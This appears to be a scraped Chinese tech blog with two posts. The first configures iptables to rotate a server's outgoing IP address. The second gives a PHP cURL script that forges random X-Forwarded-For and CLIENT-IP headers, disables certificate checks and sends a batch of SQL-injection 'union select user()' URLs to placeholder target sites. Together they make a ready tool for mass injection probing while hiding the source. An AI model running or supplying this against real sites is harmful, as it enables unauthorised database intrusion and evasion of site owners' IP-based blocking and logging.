https://bk1314.com/tag/IP/ https://bk1314.com/61.html 2022-03-11T21:22:00+08:00 希望：实现对外发送请求时，对方看到我的出口ip每次都是不一样的，多个ip轮训作为出口IP方案：iptables的nth模块more一.查看防火墙状态 service firewalld status（disabled 表明 已经禁止开启启动 enable 表示开机自启，inactive 表示防火墙关闭状态 activated（running）表示为开启状态）安装iptables防火墙及操作：yum install iptables-services常用命令如下:systemctl start iptables #启动systemctl status iptables #查看运行状态systemctl restart iptables.service #重启systemctl stop iptables.service #停止systemctl enable iptables.service #设置开机启动systemctl disable iptables.service #禁止开机启动iptables -F -t nat #清空nat规则 也就是下面的多IP设置的规则里面二.查看服务器请求外网IPcurl icanhazip.com多执行几次看看是不是同一个三.要多IP服务器循环出口IP /sbin/iptables -t nat -I POSTROUTING -m state --state NEW -p tcp -m multiport --dports 80,443 -o eth0 -m statistic --mode nth --every 1 --packet 0 -j SNAT --to-source 122.52.62.33 #解释上面命令意思: --dports 80,443意思80和443 意思请求别人的这些端口就循环IP -o eth0 这个是你网卡 出口网卡哦 --every 1 这个数字1是代表第一条IP 如果你输入多次就每次数字叠加 --to-source 122.52.62.33 你多个IP其中一个IP 列如我现在添加第二条 /sbin/iptables -t nat -I POSTROUTING -m state --state NEW -p tcp -m multiport --dports 80,443 -o eth0 -m statistic --mode nth --every 2 --packet 0 -j SNAT --to-source 122.52.62.34四.执行后记得需要保存service iptables save(好了 你可以尝试curl icanhazip.com看看 每次IP都不一样了,注意哦 防火墙需要启动哦) https://bk1314.com/25.html 2022-02-23T22:22:00+08:00 <?php function curl_multi($urls,$referer) { if (!is_array($urls) or count($urls) == 0) { return false; } $num = count($urls); $curl = $curl2 = $text = array(); $handle = curl_multi_init(); function createCh($url,$referer) { if($referer==""){ $referer=$url; } $xforip = rand(1, 254) . "." . rand(1, 254) . "." . rand(1, 254) . "." . rand(1, 254); $header = array("Connection: Keep-Alive", "Accept: application/json, text/javascript, */*; q=0.01", "Pragma: no-cache", "Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-US;q=0.5,en;q=0.3", "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36", 'CLIENT-IP:' . $xforip, 'X-FORWARDED-FOR:' . $xforip,'x-real-ip:'.$xforip); // 请求头信息 $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); // curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Linux; U; Android 4.4.1; zh-cn; R815T Build/JOP40D) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/4.5 Mobile Safari/533.1'); //设置头部 curl_setopt($ch, CURLOPT_HTTPHEADER, $header); curl_setopt($ch, CURLOPT_REFERER, $referer); //设置来源 curl_setopt($ch, CURLOPT_ENCODING, "gzip"); // 编码压缩 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); //是否采集301、302之后的页面 curl_setopt($ch, CURLOPT_MAXREDIRS, 5); //查找次数，防止查找太深 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // 对认证证书来源的检查 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); // 从证书中检查SSL加密算法是否存在 curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_HEADER, 0); //输出头部 return $ch; } //准备分配线程 foreach ($urls as $k => $v) { $url = $urls[$k]; $curl[$k] = createCh($url,$referer); //向curl批处理会话中添加单独的curl句柄 curl_multi_add_handle($handle, $curl[$k]); } $active = null; do { //运行当前 cURL 句柄的子连接 $mrc = curl_multi_exec($handle, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); while ($active && $mrc == CURLM_OK) { //等待所有cURL批处理中的活动连接 if (curl_multi_select($handle) != -1) { usleep(100); } do { //运行当前 cURL 句柄的子连接 $mrc = curl_multi_exec($handle, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); } foreach ($curl as $k => $v) { if (curl_error($curl[$k]) == "") { //如果没有报错则将获取到的字符串添加到数组中 $text[$k] = (string) curl_multi_getcontent($curl[$k]); } //移除并关闭curl该句柄资源 curl_multi_remove_handle($handle, $curl[$k]); curl_close($curl[$k]); } //关闭cURL句柄 curl_multi_close($handle); //将数组返回 return $text; } /** * 请求html页面源码接口数据方法 * @param string $url 请求地址 * @param int 访问方式 1:post 0:get 默认 get方式 * @param string 上传文件 * @param string cookie文件 * @param bool 请求头 * @return string 数据 */ function getHtml($url, $ifpost = 0, $datafields = '', $cookiefile = '', $v = false) { // 伪造IP $xforip = rand(1, 254) . "." . rand(1, 254) . "." . rand(1, 254) . "." . rand(1, 254); $header = array("Connection: Keep-Alive", "Accept: application/json, text/javascript, */*; q=0.01", "Pragma: no-cache", "Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-US;q=0.5,en;q=0.3", "User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", 'CLIENT-IP:' . $xforip, 'X-FORWARDED-FOR:' . $xforip); // 请求头信息 $ch = curl_init(); // 使用伪造代理IP curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, $v); curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ifpost && curl_setopt($ch, CURLOPT_POST, $ifpost); $ifpost && curl_setopt($ch, CURLOPT_POSTFIELDS, $datafields); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate'); $cookiefile && curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiefile); $cookiefile && curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiefile); $r = curl_exec($ch); curl_close($ch); return $r; } $arr=[ 'https://www.你的域名/?id=1%27union%20select%20user(),1,3--', 'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--', 'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--', 'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--', 'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--', 'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--', 'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--', 'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--', 'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--', 'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--', 'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--', 'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--', 'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--', 'https://www.需要测试的网址.com/index.html?wzip=' ]; $res=curl_multi($arr,"https://www.需要测试的网址.com");//测试的网址数组和来路 具体自己改良哈 var_dump($res); //echo getHtml("http://www.需要测试的网址.com/uyeeweww");